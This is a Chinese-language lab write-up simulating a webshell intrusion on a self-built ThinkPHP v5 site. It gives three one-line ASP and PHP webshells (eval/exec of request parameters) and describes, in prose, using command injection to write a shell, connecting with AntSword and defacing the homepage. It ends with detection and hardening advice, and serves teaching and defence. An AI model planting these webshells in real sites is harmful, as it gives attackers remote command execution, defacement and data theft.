声明:本文仅限交流学习使用,请勿使用在任何非法商业活动,禁止用于非法用途。否则后果自负。如有侵权,请告知删除,谢谢!
搭建网站模拟webshell写入。
“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作命令。webshell主要用于网站和服务器管理,由于其便利性和功能强大,被特别修改后的webshell也被部分人当作网站后门工具使用
常见的shell
asp:
<%eval request("cmd")% >
php:
<?php
$a=exec($_GET["input"]);
echo $a;
?>
<?php @eval($_POST['c']);?> #本次用到,c为蚁剑连接密码
实现过程:
在物理机上搭建网站,实现对网站写入webshell,并用菜刀连接木马,从而对门户网站信息篡改,获取门户网站的敏感信息。
在php搭建一个网站(网站包要放在php安装目录下的WWW文件下)
创建网站,配置网站域名和根目录。
在www下看一下是否有刚刚创建的网站包
在小皮面板刚刚创建的网站名,点击管理>>打开网站
使用后台目录扫描工具对网站目录进行扫描,可以看到存在public目录。双击进入网页
存在thinkphp v5的一个框架
在public目录下执行php请求参数命令(将whoami换成ipconfig观察回显报错,说明命令注入成功)观察到ipconfig后是cmd查看网卡信息是一样的,说明可以通过命令来执行一些操作。
下一步就是在public目录下通过请求参数去写入shell,攻击者上传Webshell后,往往还会执行进一步的操作,如提权、添加用户、写入系统后门等,实现持久化驻留。
回显没有报错就说明写入成功
通过蚁剑连接shell
连接成功
双击进入到文件目录找到文件根目录下的index.php文件双击进去,可以对门户网站的页面信息进行篡改
这一部分就是更换门户网站的主页图片
应急处置:
判断是否被植入webshell
对日志进行分析,严格管理权限,排查网站可能存在的漏洞,使用河马查杀webshell,使用wireshark抓包工具捕获网络流量并进行分析。
Webshell防御方法:
·配置必要的防火墙,并开启防火墙策略,防止暴露不必要的服务为攻击者提供利用条件。
·对服务器进行安全加固,例如,关闭远程桌面功能、定期更换密码、禁止使用最高权限用户运行程序、使用 HTTPS 加密协议等。
·加强权限管理,对敏感目录进行权限设置,限制上传目录的脚本执行权限,不允许配置执行权限等。
·安装 Webshell 检测工具,根据检测结果对已发现的可疑 Webshell 痕迹立即隔离查杀,并排查漏洞。
·排查程序存在的漏洞,并及时修补漏洞。可以通过专业人员的协助排查漏洞及入侵原因。
时常备份数据库等重要文件。
·需要保持日常维护,并注意服务器中是否有来历不明的可执行脚本文件。
·采用白名单机制上传文件,不在白名单内的一律禁止上传,上传目录权限遵循最小权限原则。